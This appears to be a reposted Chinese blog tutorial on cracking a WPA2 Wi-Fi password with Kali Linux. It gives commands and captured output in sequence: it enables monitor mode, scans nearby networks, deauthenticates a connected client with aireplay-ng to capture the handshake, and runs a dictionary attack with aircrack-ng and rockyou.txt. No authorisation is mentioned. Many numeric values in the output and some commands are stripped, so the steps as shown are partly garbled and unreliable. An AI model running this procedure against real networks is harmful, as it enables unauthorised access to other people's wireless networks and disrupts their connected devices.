kali 破解wifi
阅读原文时间:2023年07月11日阅读:2

1.查看网卡名称:iwconfig

有一块 名为wlan0 的无线网卡通过一下命令排除影响因素

root@jkali:~# iwconfig
lo no wireless extensions.

wlan0 IEEE 802.11 ESSID:"jlysltqx"
Mode:Managed Frequency:2.462 GHz Access Point: :6C::0A:CE:7D
Bit Rate=144.4 Mb/s Tx-Power= dBm
Retry short limit: RTS thr:off Fragment thr:off
Encryption key:off
Power Management:on
Link Quality=/ Signal level=- dBm
Rx invalid nwid: Rx invalid crypt: Rx invalid frag:
Tx excessive retries: Invalid misc: Missed beacon:

2.通过一下命令排除影响因素

root@jkali:~# service network-manager stop
root@jkali:~# airmon-ng check kill

Killing these processes:

PID Name
wpa_supplicant

3.启动monitor 模式

root@jkali:~# airmon-ng start wlan0

PHY Interface Driver Chipset

phy0 wlan0 iwlwifi Intel Corporation Wireless / (rev )

    (mac80211 monitor mode vif enabled for \[phy0\]wlan0 on \[phy0\]wlan0mon)  
    (mac80211 station mode vif disabled for \[phy0\]wlan0)

4.查看是否进入了监控模式

root@jkali:~# iwconfig
wlan0mon IEEE 802.11 Mode:Monitor Frequency:2.457 GHz Tx-Power= dBm
Retry short limit: RTS thr:off Fragment thr:off
Power Management:on

lo no wireless extensions.

5.进行抓包

root@jkali:~# airodump-ng wlan0mon

CH ][ Elapsed: s ][ -- :

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

0C:4B::0A:0A:B5 - - WPA
:6C::0A:CE:7D - WPA2 CCMP PSK jlysltqx
0C:6A:BC::AB:ED - WPA2 CCMP PSK ChinaNet-fG5b
:::C6::0C - WPA2 CCMP PSK ChinaNet-sWTz
E0:::7F:: - WPA2 CCMP PSK ChinaNet-SrPw
:1D::3B::E8 - WPA2 CCMP PSK CMCC-er99
8E:::C9::EB - WPA2 CCMP PSK Guest_53EB
:::C9::EB - WPA2 CCMP PSK Master
BC:D1::BD:F1: - WPA2 CCMP PSK ¬����

我们来抓jlysltqx,他的bssid为::6C::0A:CE:7D,ch 为 ,加密方式为wpa2

6.只抓我们要的wifi 的包

root@jkali:~/kk# airodump-ng wlan0mon --bssid 28:6C:07:0A:CE:7D -c 11 -w wpa
CH ][ Elapsed: s ][ -- :

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

:6C::0A:CE:7D - WPA2 CCMP PSK jlysltqx

BSSID STATION PWR Rate Lost Frames Probe

:6C::0A:CE:7D 3C:B6:B7:E0:4C: - 0e- 0e
:6C::0A:CE:7D :3E::2A::6A - -

7.6中未获取到握手信息,我们把其中一台设备断网,让其重连来航偶去握手信息

aireplay-ng - -a :6C::0A:CE:7D -c 3C:B6:B7:E0:4C: wlan0mon

8.重新执行6获取握手信息

root@jkali:~/kk# airodump-ng wlan0mon --bssid :6C::0A:CE:7D -c -w wpa
CH ][ Elapsed: min ][ -- : ][ WPA handshake: :6C::0A:CE:7D

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

:6C::0A:CE:7D - WPA2 CCMP PSK jlysltqx

BSSID STATION PWR Rate Lost Frames Probe

:6C::0A:CE:7D 3C:B6:B7:E0:4C: - 0e- 0e jlysltqx
:6C::0A:CE:7D :3E::2A::6A - -

9.查看抓到的包 wpa-04.cap 就是我们抓成功的包

root@jkali:~/kk# ls -lrt
总用量
-rw-r--r-- root root 1月 : wpa-.kismet.netxml
-rw-r--r-- root root 1月 : wpa-.kismet.csv
-rw-r--r-- root root 1月 : wpa-.csv
-rw-r--r-- root root 1月 : wpa-.cap
-rw-r--r-- root root 1月 : wpa-.kismet.netxml
-rw-r--r-- root root 1月 : wpa-.kismet.csv
-rw-r--r-- root root 1月 : wpa-.csv
-rw-r--r-- root root 1月 : wpa-.cap
-rw-r--r-- root root 1月 : wpa-.kismet.netxml
-rw-r--r-- root root 1月 : wpa-.kismet.csv
-rw-r--r-- root root 1月 : wpa-.csv
-rw-r--r-- root root 1月 : wpa-.cap
-rw-r--r-- root root 1月 : wpa-.kismet.netxml
-rw-r--r-- root root 1月 : wpa-.kismet.csv
-rw-r--r-- root root 1月 : wpa-.csv
-rw-r--r-- root root 1月 : wpa-.cap

10.利用字典来进行解密(若字典文件未解压,请自行解压)

aircrack-ng -w /usr/share/wordlists/rockyou.txt wpa-.cap

11.破解完成后恢复网络

root@jkali:~# service network-manager start
root@jkali:~# airmon-ng stop wlan0mon

PHY Interface Driver Chipset

phy0 wlan0mon iwlwifi Intel Corporation Wireless / (rev )

    (mac80211 station mode vif enabled on \[phy0\]wlan0)

    (mac80211 monitor mode vif disabled for \[phy0\]wlan0mon)

手机扫一扫

移动阅读更方便

阿里云服务器
腾讯云服务器
七牛云服务器

你可能感兴趣的文章